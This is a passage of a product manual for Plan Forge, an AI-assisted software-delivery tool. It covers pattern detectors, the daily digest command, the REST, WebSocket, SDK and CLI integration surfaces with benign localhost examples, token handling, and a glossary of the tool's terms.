| model-failure-rate-by-complexity | Models whose failure rate climbs steeply with slice complexity | "Use a flagship model for the hard slices, fast model for the easy ones" |
| slice-flap-pattern | Slices that succeed-then-fail-then-succeed on retry (non-monotonic outcomes) | "Flaky gate or non-deterministic test in this slice" |
| cost-anomaly | Runs whose cost-per-slice exceeds the 90-day median by ≥2.5× | "Token blow-up, investigate retry logic or context bloat" |
forge_patterns_list({ windowDays: 30, limit: 10 })
// Response:
{
generatedAt: "2026-05-17T14:00:00Z",
windowDays: 30,
patterns: [
{
detector: "gate-failure-recurrence",
severity: "high",
title: "Gate 'tsc --noEmit' failed in 5 slices across 3 plans",
evidence: { slices: ["Phase-29:3", "Phase-30:1", "Phase-30:4", "Phase-31:2", "Phase-31:5"], commonError: "TS2307: Cannot find module ..." },
suggestedAction: "Investigate tsconfig path mapping; consider widening gate or fixing build config."
},
{
detector: "cost-anomaly",
severity: "medium",
title: "Phase-31 cost/slice 3.1× over 90-day median",
evidence: { phase: "Phase-31", medianUsd: 0.42, observedUsd: 1.31, primarySuspect: "long-context-retries" }
}
// ...
],
total: 7
}
The Recurring Patterns dashboard panel is a thin renderer over this tool's output, sorted by severity descending. Each finding has a "Suppress for 7 days" button (the suppression list lives in .forge/patterns-suppressions.json; see Conventions for the format).
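As an illustration of how simple these detectors can be, here is a sketch of the cost-anomaly rule. It reads "exceeds the 90-day median by ≥2.5×" as "cost per slice is at least 2.5 times the median", which is an interpretation. The function names and input shapes are hypothetical; the evidence fields mirror the sample finding above.

```javascript
// Median of a list of numbers (average of the middle pair for even lengths).
function median(values) {
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Flag runs whose cost per slice is at least `factor` times the historical median.
function detectCostAnomalies(historyUsd, runs, factor = 2.5) {
  const baseline = median(historyUsd);
  return runs
    .filter((run) => run.costPerSlice >= baseline * factor)
    .map((run) => ({
      detector: "cost-anomaly",
      phase: run.phase,
      medianUsd: baseline,
      observedUsd: run.costPerSlice,
      ratio: Number((run.costPerSlice / baseline).toFixed(1)),
    }));
}
```

With a median of 0.42 and an observed 1.31 per slice, the ratio comes out at 3.1, in line with the "3.1× over 90-day median" title in the sample response.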
pforge digest: Yesterday's Digest
The graph and the detectors give you raw findings. pforge digest compresses them into a single human-readable summary intended to be the first thing you read each morning.
pforge digest
pforge digest --since=24h # default
pforge digest --since=7d # weekly roll-up
pforge digest --format=json # machine-readable
pforge digest --post # post to configured notification channel
A typical digest collects six categories of finding, among them results from forge_doctor_quorum, drift from forge_drift_report, and findings from the cost-anomaly detector.
The Yesterday's Digest dashboard tile is the same content, rendered in HTML. The CLI form is useful in a daily Slack post or as the body of a forge_notify_send message.
Running pforge digest --post at 09:00 every weekday with a Slack notifier configured (notify-slack extension) gives you a free daily standup grounded in actual run data, not vibes.
| Path | Purpose | Rebuildable |
|---|---|---|
| .forge/graph/snapshot.json | Serialized graph index | Yes, pforge graph rebuild |
| .forge/patterns-suppressions.json | User-suppressed pattern findings + expiry | No (state) |
| .forge/digests/YYYY-MM-DD.json | Cached daily digest output | Yes, pforge digest --rebuild |
| .forge/runs/, .forge/trajectories/, .forge/bugs/, .forge/cost/ | Source logs (graph is derived from these) | Authoritative |
pforge graph stats # node/edge counts, last-rebuild timestamp
pforge graph rebuild # full rebuild from logs
pforge graph query hot-files # run a canned query
pforge patterns # list current findings from all four detectors
pforge patterns --since=7d
pforge digest # the morning summary
pforge digest --post # send via configured notifier
MCP is the native transport for Copilot and similar agents, but it is not the only one. Plan Forge ships four orthogonal surfaces so any tool can drive the workshop: REST for HTTP-anything, SDK for Node.js callers, WebSocket hub for live event streams, and CLI for scripts and humans.
113 REST endpoints, a WebSocket hub, an SDK with four entry points (pforge-sdk, /tools, /hallmark, /chunker), and 97 CLI commands. The same underlying handlers back every surface; pick the one that fits the caller, not the feature.
The same handler set lives behind all four surfaces. Adding a new tool means the team writes one handler, and it automatically becomes available as MCP tool, REST endpoint, CLI command, and SDK export. This is intentional: the integration surface should never be the bottleneck for a new capability.
The REST surface is the right choice for any caller that already speaks HTTP: GitHub Actions, GitLab CI, a Python script, a curl one-liner, a Postman collection. It is also the surface the dashboard itself uses.
# Local dev (default)
http://localhost:3100/api
# Auth: bearer token from .forge/secrets.json (key: "apiToken")
curl -H "Authorization: Bearer $PFORGE_API_TOKEN" \
http://localhost:3100/api/plan/status
Tokens are generated by pforge auth issue and stored locally in .forge/secrets.json (gitignored). Multi-developer setups use one token per developer; CI uses a dedicated CI token with scoped permissions.
The 113 endpoints organize into 16 subsystems that mirror the MCP tool families. The full per-endpoint reference lives in Appendix W — REST API Reference; this chapter covers the shape:
| Prefix | Backs | Sample endpoint |
|---|---|---|
| /api/plan | Plan execution + status | POST /api/plan/run |
| /api/cost | Cost reports + estimates | GET /api/cost/report |
| /api/team | Team dashboard + activity | GET /api/team/dashboard |
| /api/copilot-instructions | Copilot trilogy | POST /api/copilot-instructions/sync |
| /api/graph | Knowledge graph queries | POST /api/graph/query |
| /api/liveguard | Deploy safety surface | POST /api/liveguard/run |
| /api/bugs | Bug registry | GET /api/bugs |
| /api/crucible | Idea smelting | POST /api/crucible/ask |
| /api/forge-master | Read-only reasoning agent | POST /api/forge-master/ask |
| /api/hub | WebSocket event stream (see next section) | WS /api/hub |
Every endpoint returns RFC 7807 ProblemDetails on error and a structured JSON object on success. The OpenAPI spec lives at GET /api/openapi.json if you need codegen.
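A client-side sketch for separating the two response shapes. RFC 7807 defines the `type`, `title`, `status`, `detail`, and `instance` members and the `application/problem+json` media type. Whether the Plan Forge server sets that exact content type is an assumption, and the `ForgeApiError` class and `unwrap` helper are hypothetical names, not part of any shipped SDK.

```javascript
// Error carrying the RFC 7807 members of a problem document.
class ForgeApiError extends Error {
  constructor(problem) {
    super(problem.detail ?? problem.title ?? "Request failed");
    this.name = "ForgeApiError";
    this.type = problem.type ?? "about:blank"; // RFC 7807 default
    this.title = problem.title;
    this.status = problem.status;
    this.instance = problem.instance;
  }
}

// Return the success body, or throw a typed error for a problem document.
// Input is a plain object so the helper works with any HTTP client.
function unwrap({ ok, contentType, body }) {
  if (ok) return body;
  if ((contentType ?? "").startsWith("application/problem+json")) {
    throw new ForgeApiError(body);
  }
  throw new Error("Unexpected error response");
}
```

With fetch, the three inputs would come from response.ok, response.headers.get("content-type"), and await response.json().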
/api/hub
The WebSocket hub is a broadcast channel that emits every event the orchestrator generates: plan starts, slice transitions, gate results, cost samples, bug filings, drift updates. It is the substrate the dashboard's live tiles render off.
// Node.js
import { WebSocket } from "ws";
const ws = new WebSocket("ws://localhost:3100/api/hub", {
headers: { Authorization: `Bearer ${process.env.PFORGE_API_TOKEN}` }
});
ws.on("message", (raw) => {
const event = JSON.parse(raw.toString());
console.log(event.type, event.payload);
});
{
"type": "slice.commit", // canonical event name
"ts": "2026-05-17T09:18:41Z",
"actor": "alice@example.com",
"plan": "Phase-31",
"slice": "2",
"payload": { "sha": "e4f5g6h", "durationMs": 24100, "gates": ["pass","pass"] }
}
The full event catalog, 38 event types across eight families with envelope, source/security_risk enums, payloads, and retention, lives in Appendix V — Event Catalog. The canonical JSON schema lives in pforge-mcp/EVENTS.md. Subscribe to all events or filter by type:
ws.send(JSON.stringify({
subscribe: ["slice.*", "gate.fail", "bug.opened"]
}));
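If you also want to filter on the client, for instance to route events to different handlers, the subscription patterns can be mirrored locally. This sketch assumes a trailing ".*" matches any event type in that family and that anything else must match exactly. The hub's real matching rules are not spelled out here, and both function names are hypothetical.

```javascript
// True when `type` matches `pattern`: "slice.*" covers "slice.commit",
// while a pattern without a wildcard must equal the type exactly.
function matchesPattern(pattern, type) {
  if (pattern.endsWith(".*")) {
    return type.startsWith(pattern.slice(0, -1)); // keep the dot: "slice."
  }
  return pattern === type;
}

// Build a predicate over events from a list of subscription patterns.
function createEventFilter(patterns) {
  return (event) => patterns.some((pattern) => matchesPattern(pattern, event.type));
}
```

Keeping the dot in the prefix means "slice.*" does not accidentally match a hypothetical "slices.archived" type.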
The /dashboard route is built on top of this WebSocket. If you want to embed Plan Forge progress into your own ops portal, point a WebSocket client at /api/hub, filter to the event types you care about, and render. Zero polling.
pforge-sdk: the Node.js client
For TypeScript / JavaScript callers, pforge-sdk is a thin wrapper over the REST and WebSocket surfaces with typed responses and bundled helpers. It ships with four entry points:
| Import | Contains |
|---|---|
| pforge-sdk | Core client: createClient({ baseUrl, token }), all REST methods, WebSocket subscriber |
| pforge-sdk/tools | Typed wrappers for every MCP tool; call any forge_* tool from Node.js |
| pforge-sdk/hallmark | Hallmark stamp helpers: sign / verify generated artifacts |
| pforge-sdk/chunker | Plan-chunker: split long plans into Scope-Contract-aligned slices for execution |
import { createClient } from "pforge-sdk";
import { forgeRunPlan, forgeEstimateQuorum } from "pforge-sdk/tools";
const client = createClient({
baseUrl: "http://localhost:3100",
token: process.env.PFORGE_API_TOKEN
});
// Estimate before running (cost discipline, never hand-compute)
const est = await forgeEstimateQuorum(client, { plan: "docs/plans/Phase-31-PLAN.md" });
console.log("Cheapest mode:", est.recommendation);
// Execute
const run = await forgeRunPlan(client, {
plan: "docs/plans/Phase-31-PLAN.md",
quorum: est.recommendation
});
// Subscribe to live events for this run
const sub = client.subscribe(["slice.*", "gate.*", "plan.complete"]);
for await (const event of sub) {
if (event.plan !== "Phase-31") continue;
console.log(event.type, event.payload);
if (event.type === "plan.complete") break;
}
The CLI is the right surface for ad-hoc scripts, cron jobs, and direct human use. Every command has a --json flag for machine-readable output, so it composes cleanly with shell pipelines and CI scripts.
# Run a plan and pipe the result into jq
pforge run-plan docs/plans/Phase-31-PLAN.md --json | jq '.cost.totalUsd'
# Loop until a plan completes (useful in CI)
while [ "$(pforge plan-status --json | jq -r '.state')" != "complete" ]; do
sleep 30
done
# Daily digest into Slack
pforge digest --post
# Cost rollup for the month
pforge cost-report --since=30d --json | jq '.byModel'
The full 97-command reference lives in Chapter 8 — CLI Reference. The pforge --help output is the canonical source.
| Caller | Use | Why |
|---|---|---|
| GitHub Copilot / Claude / Cursor / Codex | MCP | Native transport; auto-discovered tools |
| GitHub Actions / GitLab CI / Jenkins | REST + CLI | Already speak HTTP and shell; no MCP transport in CI |
| Custom dashboard / status page | REST (initial) + WebSocket (live) | Snapshot on load, live updates after |
| Node.js script / automation | SDK | Typed responses; no transport boilerplate |
| cron job / one-shot batch | CLI | --json pipes cleanly; no long-running process |
| Mobile / web app / Slack bot | REST + WebSocket | Cross-platform; no Node.js requirement |
All four surfaces share the same auth model:
- The token is passed in the Authorization header (REST + WebSocket) or as the PFORGE_API_TOKEN env var (CLI + SDK).
- Tokens are issued with pforge auth issue [--scope=…] and stored in .forge/secrets.json (gitignored).
- Provider keys live in .forge/secrets.json under providers.* or in environment variables. Never in code, never in committed config.
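For REST callers that do not use the SDK, the header can be assembled from the environment. A minimal sketch: the Bearer scheme and PFORGE_API_TOKEN come from this chapter, while `authHeaders` and the Accept header are illustrative additions.

```javascript
// Sketch: build request headers from an environment-like object.
// `authHeaders` is a hypothetical helper, not part of pforge-sdk.
function authHeaders(env) {
  const token = env.PFORGE_API_TOKEN;
  if (!token) {
    throw new Error("PFORGE_API_TOKEN is not set");
  }
  return {
    Authorization: `Bearer ${token}`,
    Accept: "application/json" // illustrative; not required by the manual
  };
}

const headers = authHeaders({ PFORGE_API_TOKEN: "example-token" });
console.log(headers.Authorization);
```

In a real script the argument would be process.env, which keeps the token out of source files.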
Every Plan Forge term defined.
Auto-generated from capabilities.mjs glossary, hand-edited for clarity.
If you're new to Plan Forge, these five terms cover 80% of the manual. They build on each other in this order:
Plan: a Markdown file in docs/plans/ that describes one feature. The unit of work Plan Forge operates on.
Validation Gate: build and test commands (e.g. dotnet test) that must pass before the next slice runs. Gates are how Plan Forge knows the AI didn't break anything.
Read those five and you can follow the rest of the manual without backtracking. The full alphabetical reference begins below, organized by topic.
| Term | Definition |
|---|---|
| Plan Forge | The AI-Native SDLC Forge Shop. One workshop with four stations (Smelt, Forge, Guard, Learn) connected by gates, telemetry, and persistent memory. Covers every phase of the software lifecycle. |
| Forge | Shorthand for Plan Forge. Also: .forge/ directory (project data), .forge.json (config). |
| Plan | A Markdown file in docs/plans/ describing a feature. Contains slices, scope contract, and gates. |
| Hardened Plan | A plan that passed Step 2: a locked-down execution contract with scope, slices, gates, and forbidden actions. |
| Scope Contract | Plan section defining In Scope, Out of Scope, and Forbidden files. Prevents scope creep. |
| Slice | A 30–120 minute unit of execution within a plan. Has tasks, a validation gate, and optional dependencies. Commit-sized: small enough to catch failures early, large enough to be useful. |
| Validation Gate | Build + test commands that must pass at every slice boundary before proceeding. |
| Forbidden Actions | Files or operations the AI must not touch. Enforced by lifecycle hooks and scope checks. |
| Stop Condition | A condition that halts execution, e.g., "If migration fails, STOP." |
| Guardrails | Instruction files that auto-load based on the file being edited. 15–18 per preset. |
| Preset | Stack-specific configuration (dotnet, typescript, python, etc.). Determines which files are installed. |
| Extension | Community add-on providing instructions, agents, or prompts for a specific domain. |
| Self-Deterministic Agent Loop | The v2.58 system-wide model: the deterministic slice executor plus ten opt-in inner-loop subsystems (reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, reviewer, competitive execution, auto-fix, cost-anomaly). Execution stays reproducible; loop context improves each pass. See the canonical overview. |
| Phase | Versioned chunk of Plan Forge development. Plans live at docs/plans/Phase-N-PLAN.md. A phase contains 1+ plans; each plan contains 1+ slices. Numbering is monotonic across the project (Phase-28.2, Phase-31, etc.). |
| Tempering | Post-execution coverage & quality subsystem. Scans the diff with pluggable scanners (typecheck, lint, content-audit, secret-scan), classifies findings into real-bug / flaky / noise lanes, and feeds the Bug Registry. Distinct from LiveGuard (runtime defense) and the Reviewer Gate (architectural review). 5 MCP tools: forge_tempering_run/scan/status/drain/approve_baseline. |
| Skill | A multi-step procedure invoked from chat via a /slash-command (e.g. /code-review, /staging-deploy, /health-check). Defined as SKILL.md files under .github/skills/. Runs through forge_run_skill with its own validation gates. |
| Project Principles | Project-level guardrails generated by .github/prompts/project-principles.prompt.md and stored in docs/plans/PROJECT-PRINCIPLES.md. Auto-load via project-principles.instructions.md when the file exists. Define forbidden patterns, technology commitments, and architectural boundaries. |
| AI Plan Hardening Runbook | The canonical 7-step pipeline every plan flows through (Specify → Preflight → Harden → Execute → Sweep → Review → Ship). Master copy: docs/plans/AI-Plan-Hardening-Runbook.md. |
The Forge Shop's organizing taxonomy: every Plan Forge feature lives at one of these four stations.
| Term | Definition |
|---|---|
| Forge Shop | The whole workshop. The collective name for the four stations and the connective tissue (gates, telemetry, memory) that ties them together. |
| Station | One of the four phase-specific zones in the Forge Shop. Each station has its own tools, agents, artifacts, and gate to the next station. |
| Act | The Manual's organizational unit. Each Act covers one station's chapters. Act I = Smelt (Ch 1–5), Act II = Forge (Ch 6–15), Act III = Guard (Ch 16–20), Act IV = Learn (Ch 21–24). |
| 🪨 Smelt | Station 1: Intake → Scope Contract. Where rough ideas become hardened plans the Forge can execute. Houses the Specifier agent, the AI Plan Hardening Runbook, the Crucible, and Project Principles. |
| 🔨 Forge (station) | Station 2: Scope Contract → shipped code. Where slices are struck against the anvil. Houses pforge run-plan, slice gates, quorum mode, auto-escalation, and the cost ledger. |
| 🛡️ Guard | Station 3: Post-deploy defense. The watchtower. Houses LiveGuard (secret scan, drift, regression guard, env diff, incident capture), the Watcher, and the Remote Bridge. |
| 🧠 Learn | Station 4: Memory and retrospectives. The brain above the bench. Houses OpenBrain, the Bug Registry, the Testbed, Health DNA, and Forge Intelligence. |
| Watcher | Tool (forge_watch, forge_watch_live) that tails another project's pforge run from a separate VS Code session. Read-only by contract, cannot modify the target. |
| Remote Bridge | Notification dispatcher that forwards hub events to Telegram, Slack, Discord, OpenClaw, or a generic webhook. Used for phone-friendly progress updates and approval prompts. |
| Bug Registry | Closed-loop scanner-bug tracker. Four tools: forge_bug_register, forge_bug_list, forge_bug_update_status, forge_bug_validate_fix. Records live in .forge/bugs/<bugId>.json. |
| Bug Fingerprint | Hash of scanner name + test name + assertion message + normalized stack trace. Re-registering a duplicate fingerprint returns DUPLICATE_BUG with the existing bugId. |
| Bug Status | State machine: open → in-fix → validating → fixed, with side branches to wont-fix, duplicate, and noise. Illegal transitions return INVALID_TRANSITION. |
| Bug Classifier | Heuristic that labels evidence as real-bug (persisted), flaky (ignored), or noise (discarded). Only real-bug writes to .forge/bugs/. |
| Testbed | Tool (forge_testbed_run) that replays scenario fixtures against a dedicated repo. Scenarios in docs/plans/testbed-scenarios/*.json; findings in docs/plans/testbed-findings/*.json. Feeds the Bug Registry and Health DNA. |
| Crucible | Smelt-station idea funnel for community extensions. Lifecycle: Submitted → Crystallized → Tempered → Hardened. Stalled Crystallized ideas surface as Watcher anomalies. |
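The Bug Status entry above describes a small state machine, which can be sketched as a transition table. The main path (open → in-fix → validating → fixed) and the INVALID_TRANSITION code come from the glossary; which states may branch to wont-fix, duplicate, or noise is an assumption made for illustration, and the real registry may allow other moves (for example, back from validating to in-fix).

```javascript
// Sketch of the Bug Status state machine.
// Side-branch rules are assumed, not taken from the Bug Registry source.
const SIDE_BRANCHES = ["wont-fix", "duplicate", "noise"];
const TRANSITIONS = new Map([
  ["open", ["in-fix", ...SIDE_BRANCHES]],
  ["in-fix", ["validating", ...SIDE_BRANCHES]],
  ["validating", ["fixed", ...SIDE_BRANCHES]],
  ["fixed", []],
  ["wont-fix", []],
  ["duplicate", []],
  ["noise", []]
]);

function transition(current, next) {
  const allowed = TRANSITIONS.get(current) || [];
  if (!allowed.includes(next)) {
    // Mirrors the documented error code for illegal transitions.
    return { ok: false, code: "INVALID_TRANSITION", status: current };
  }
  return { ok: true, status: next };
}

console.log(transition("open", "in-fix"));
console.log(transition("open", "fixed"));
```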
| Term | Definition |
|---|---|
| Pipeline | The 7-step process: Specify → Preflight → Harden → Execute → Sweep → Review → Ship. |
| Step 0 (Specify) | Define what and why: a structured specification with acceptance criteria. |
| Step 1 (Preflight) | Verifies prerequisites before plan execution: git clean, build green, environment vars set. Ships as a prompt (.github/prompts/step1-preflight-check.prompt.md), not a separate agent persona. |
| Step 2 (Harden) | Convert spec into binding execution contract with slices, gates, and scope. |
| Step 3 (Execute) | Build code slice-by-slice. Can be automated or manual. |
| Step 5 (Review Gate) | Independent audit session that checks for drift, scope violations, and quality. |
| Specifier | Step 0 agent persona that turns a one-line idea into a structured specification with acceptance criteria. Lives at .github/agents/specifier.agent.md. |
| Plan Hardener | Step 2 agent/runbook that converts a draft plan into a Hardened Plan by adding scope contract, validation gates, forbidden actions, and rollback. Lives at .github/prompts/step2-harden-plan.prompt.md. |
| Reviewer Gate | Step 5 agent persona that runs in a fresh session, reads the plan's Scope Contract, and audits the diff for drift and quality. Distinct from LiveGuard (runtime layer). Can be delegated to GitHub Copilot cloud agent via forge_delegate_review. |
| Shipper | Step 6 agent persona for commit, push, deploy, and close. Lives at .github/agents/shipper.agent.md. |
| Runbook (tool) | The forge_runbook MCP tool that exposes the AI Plan Hardening Runbook as a callable surface. Agents can request the canonical step list, gate templates, and prompt URIs without re-reading the Markdown source. |
| Runbook | As a bare term in Plan Forge, always refers to the AI Plan Hardening Runbook (the document) or the forge_runbook tool that exposes it. See both entries for specifics. |
| applyTo | Frontmatter field in instruction files that controls which files trigger auto-loading. Uses glob patterns (e.g., ** for all files, *.cs for C# only). |
| Term | Definition |
|---|---|
| Full Auto | Mode where gh copilot CLI runs each slice automatically. No human intervention. |
| Assisted | Mode where human codes in VS Code; orchestrator validates gates between slices. |
| Worker | The CLI process executing a slice: gh copilot, claude, or codex. |
| DAG | Directed Acyclic Graph: the dependency graph of slices that determines execution order. |
| [P] tag | Parallel-safe marker on a slice header. Enables concurrent execution. |
| [depends: Slice N] | Dependency marker. Slice waits for N to complete before starting. |
| Quorum Mode | Multi-model consensus on slice execution: 3+ models analyze a slice independently, reviewer synthesizes best approach. Auto-winner. CLI: --quorum=auto/power/speed/false. |
| Quorum Auto | Threshold-based: only slices scoring above the complexity threshold use quorum. |
| Quorum Power | Multi-model consensus using flagship models (highest quality, highest cost). Complexity threshold 5. CLI: --quorum=power. |
| Quorum Speed | Multi-model consensus using fast models (lower quality, lower cost). Complexity threshold 7. CLI: --quorum=speed. |
| Quorum Advisory | Multi-model consensus on Forge-Master prompts (not slices). Returns all replies + dissent summary; human picks the reply. Configured via forgeMaster.quorumAdvisory: "off" | "auto" | "always". Hard-blocked on operational, troubleshoot, build lanes. |
| Complexity Score | 1–10 rating based on file scope, dependencies, security keywords, gate count, historical failure rate. |
| Escalation Chain | Model failover order: if Model A fails, try B, then C. |
| Forge-Master | Read-only reasoning orchestrator with three-stage intent classifier (keyword → embedding cache → router LLM). Lives at forge_master_ask + Studio dashboard tab. Phase-28 MVP, subsequently expanded with quorum advisory and unified timeline. |
| Forge-Master Observer | Background hub subscriber (pforge-master/src/observer-loop.mjs) that batches live Plan Forge events and narrates notable patterns in plain prose via the reasoning loop. Mute-by-default: enable with forgeMaster.observer.enabled: true. Budget-capped via maxUsdPerDay and maxNarrationsPerHour. Started with pforge master observe --start [--detach] or the forge_master_observe MCP tool. |
| Cross-Run Watcher | Watcher mode (runWatch({ mode: "cross-run" })) that aggregates .forge/runs/*/summary.json across multiple completed runs into a health snapshot. Detects recurring gate failures, retry-rate spikes, cost anomaly trends, and slice-timeout clusters. Feeds the A4 plan-health auditor agent when triggered by hooks.postRun.invokeAuditor. |
| Auditor Auto-Invoke | PostRun hook behavior (hooks.postRun.invokeAuditor) that automatically triggers the A4 plan-health auditor on run failure (onFailure: true) or every N completed runs (everyNRuns: N). The auditor report is written to .forge/health/latest.md. See forge-json-reference § hooks.postRun. |
| Embedding Cache | Stage 1.5 of the Forge-Master intent classifier. Cosine-similarity match (≥ 0.85) against previously-classified prompts. Zero API cost on hit, works fully offline once warm. 500-entry LRU. |
| CRITICAL_FIELDS | The six fields the Crucible critical-fields gate requires before finalizing: build-command, test-command, scope, validation-gates, forbidden-actions, rollback. Added v2.82.1. |
| Host-Aware Routing | Routing preference that detects the IDE/CLI host (VS Code, Claude Code, Cursor, Windsurf, Zed, CLI) and chooses CLI proxy vs direct API to honor whichever subscription the user is paying for. Modes: auto / gh-copilot / direct-api / drop. |
| DIRECT_API_ONLY | Routing class for models with no CLI proxy: grok-*, dall-e-*. Always require an API key (XAI_API_KEY / OPENAI_API_KEY). |
| COPILOT_SERVABLE | Routing class for gpt-* / chatgpt-* models. gh-copilot can proxy them via your Copilot subscription; direct API is fallback if OPENAI_API_KEY is set. |
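To make the DAG and [depends: Slice N] entries concrete, here is a sketch that groups slices into execution waves: every slice in a wave has all of its dependencies in earlier waves. The `{ id, dependsOn }` shape and `executionWaves` are hypothetical and not the orchestrator's data model; a dependency on an id that is not in the list is treated as already satisfied.

```javascript
// Sketch: derive execution waves from slice dependencies.
// The slice shape is an illustrative assumption.
function executionWaves(slices) {
  const remaining = new Map(slices.map((s) => [s.id, new Set(s.dependsOn)]));
  const waves = [];
  while (remaining.size > 0) {
    // A slice is ready once none of its dependencies are still unscheduled.
    const ready = [...remaining.keys()].filter((id) =>
      [...remaining.get(id)].every((dep) => !remaining.has(dep))
    );
    if (ready.length === 0) {
      throw new Error("Cycle detected: the slice graph is not a DAG");
    }
    waves.push(ready);
    ready.forEach((id) => remaining.delete(id));
  }
  return waves;
}

const waves = executionWaves([
  { id: 1, dependsOn: [] },
  { id: 2, dependsOn: [1] },
  { id: 3, dependsOn: [1] },
  { id: 4, dependsOn: [2, 3] }
]);
console.log(JSON.stringify(waves)); // [[1],[2,3],[4]]
```

Slices that land in the same wave are the candidates for concurrent execution; whether they actually run in parallel would still depend on the [P] tag.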
| Term | Definition |
|---|---|
| Smith | Diagnostic tool (pforge smith). Inspects environment, setup, version. Named after a blacksmith. |
| Sweep | Completeness scan (pforge sweep). Finds TODO/FIXME/stub markers. |
| Analyze | Consistency scoring (pforge analyze). Scores 0–100 across 4 dimensions. |
| Orchestrator | Execution engine. Parses plans, schedules slices, spawns workers, validates gates. |
| Hub | WebSocket event server. Broadcasts slice events to connected clients in real-time. |
| Dashboard | Web UI at localhost:3100/dashboard. 25 tabs for monitoring, cost, replay, skills, config, watcher, and LiveGuard. |
| Lifecycle Hook | Automatic actions tied to Plan Forge's pipeline: PreDeploy, PreCommit, PreAgentHandoff, PostSlice (configured via .github/hooks/plan-forge.json). Distinct from Claude Code's own hook names. |
| OpenBrain | The L3 memory layer. Self-hosted MCP server (PostgreSQL + pgvector) that provides cross-session, cross-tool semantic memory. Plan Forge ships with L1 (Hub) + L2 (.forge/*.jsonl) memory built-in; L3 requires OpenBrain. Without it, Reflexion lessons, Auto-skills, cross-project Federation, and 28 auto-capturing tools become inert. Recommended at install time; easy to add later via pforge brain hint. Deploy options: Docker, Supabase, Kubernetes, Azure. See srnichols.github.io/OpenBrain. |
| MCP | Model Context Protocol. A standard for AI agents to call functions. Plan Forge's MCP server exposes 102 tools (core + LiveGuard + Watcher + Crucible + Tempering + Bug Registry + Testbed + Forge-Master). |
| ACI | Agent-Computer Interface. The SWE-agent principle that an agent only performs as well as the surface lets it: bounded payloads, sparse fields, paginated lists, friendly empty-result messages. Enforced in Plan Forge via tool-surface temper guards in architecture-principles.instructions.md. forge_search is the reference standard. |
| Bridge | Notification dispatcher that forwards WebSocket hub events to external platforms (Slack, Discord, Telegram, generic webhooks). |
| Knowledge Graph | In-memory graph of Phase / Slice / Commit / File / Run / Bug nodes, queryable via forge_graph_query. Used by Forge-Master for cross-feature reasoning. See Chapter 28. |
| Cost Ledger | Aggregated token + dollar history across runs (.forge/cost-history.json). Powers forge_cost_report, anomaly detection, and the cost dashboard tab. |
| Worktree | Git worktree feature used by Plan Forge so multiple developers can run plans on the same repo without colliding. Each worktree gets its own .forge/ directory and a row in the shared team-activity ledger. |
| Discovery Harness | 4-pass build sequence (Harness → Wrapper → Execute → Auto-smelt) that crawls a running app, converts findings to Crucible smelts, runs slices with Tempering, and re-smelts failures into new bugs. |
| Spec Kit Interop | Bridge that imports GitHub Spec Kit projects via forge_crucible_import using deterministic field mapping (no LLM call). Spec Kit specs become Crucible smelts. |
| Foundry | Microsoft Foundry, the external Azure-hosted agent platform Plan Forge integrates with. Provides Foundry Toolboxes (MCP-compatible tool bundles), Foundry Agent Service (hosted agent runtime), and Foundry App Insights (OTel sink). See foundry-quota.mjs and the microsoft-foundry skill. |
| Lattice | v2.95 code-graph engine. Semantic chunk index plus BFS call-graph traversal for any git repository. Produces .forge/lattice/chunks.jsonl and edges.jsonl. Pure-JS chunker with optional tree-sitter upgrade. Five MCP tools: index / stat / query / callers / blast. CLI: pforge lattice. |
| Anvil | Δ-only memoization layer for the Lattice. Caches expensive analyses (chunk extraction, embedding lookups, gate replays) keyed by content hash; only recomputes the delta when source changes. CLI: pforge anvil stat / purge. Hit rate is reported by forge_lattice_stat. |
| Triage | Plan Forge's noise-vs-signal classifier surface. Two tools: forge_alert_triage (groups and prioritizes open LiveGuard alerts) and forge_triage_route (routes a finding to a lane: real-bug, flaky, noise, or human-review). CLI: pforge triage. |
| Timeline | Chronological event view exposed via forge_timeline. Merges run events, gate results, commits, and incidents on a single axis for the current phase or slice. |
| Home Snapshot | Bounded activity overview returned by forge_home_snapshot. Pagination-friendly summary of recent runs, open bugs, drift score, and active plans. The default landing payload for Forge-Master and the Studio home tab. |
| Image Generation | Image synthesis surface (forge_generate_image) that proxies DALL-E / image models for chapter heroes, diagrams, and marketing assets. DIRECT_API_ONLY, requires OPENAI_API_KEY. |
| GitHub Metrics | Subsystem (github-metrics.mjs) that ingests PR / issue / commit metrics from the GitHub REST API and feeds them into Health DNA and Forge Intelligence. Paired with github-introspect.mjs for repo-shape introspection. |
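The Lattice entry mentions BFS call-graph traversal. The sketch below shows the general technique for a "who is affected if this function changes" query. The `{ from, to }` edge shape is an assumption, since the edges.jsonl schema is not shown in this manual, and `transitiveCallers` is a hypothetical name rather than a Lattice API.

```javascript
// Sketch: breadth-first search over call-graph edges to collect every
// direct and indirect caller of a target. Edge shape is assumed.
function transitiveCallers(edges, target) {
  const callersOf = new Map();
  for (const { from, to } of edges) {
    if (!callersOf.has(to)) callersOf.set(to, []);
    callersOf.get(to).push(from);
  }
  const seen = new Set([target]);
  const queue = [target];
  const result = [];
  while (queue.length > 0) {
    const node = queue.shift();
    for (const caller of callersOf.get(node) || []) {
      if (seen.has(caller)) continue; // guards against recursive call cycles
      seen.add(caller);
      result.push(caller);
      queue.push(caller);
    }
  }
  return result;
}

const edges = [
  { from: "api", to: "service" },
  { from: "service", to: "db" },
  { from: "cli", to: "service" }
];
console.log(transitiveCallers(edges, "db")); // [ 'service', 'api', 'cli' ]
```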
Plan Forge nests four named loops inside its outer Self-Deterministic Agent Loop. Each loop has its own canonical chapter; the entries below are the one-line cards.
| Term | Definition |
|---|---|
| Inner Loop | The slice-level reasoning loop composed of the ten inner-loop subsystems (reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, reviewer, competitive execution, auto-fix, cost anomaly). Wraps every slice attempt. See Inner Loop deep dive. |
| Competitive Loop | Multi-model race pattern within slice execution. Two or more workers attempt the same slice in parallel; the orchestrator validates each and ships the winner. See Competitive Loop deep dive. |
| Audit Loop | Closed-loop bug discovery from a running system. Content-audit scanner → triage → drain cycle iterates until convergence. Default off; opt-in via .forge.json#audit.mode. Production environments hard-blocked. See Audit Loop deep dive. |
| Self-Deterministic Loop | Alias for Self-Deterministic Agent Loop. The system-wide outer loop that wraps the deterministic slice executor with all inner-loop subsystems. |
The ten opt-in subsystems that compose the Inner Loop. Each is independently configurable; the Reviewer subsystem reuses the Step 5 Reviewer Gate agent persona (see Pipeline).
| Term | Definition |
|---|---|
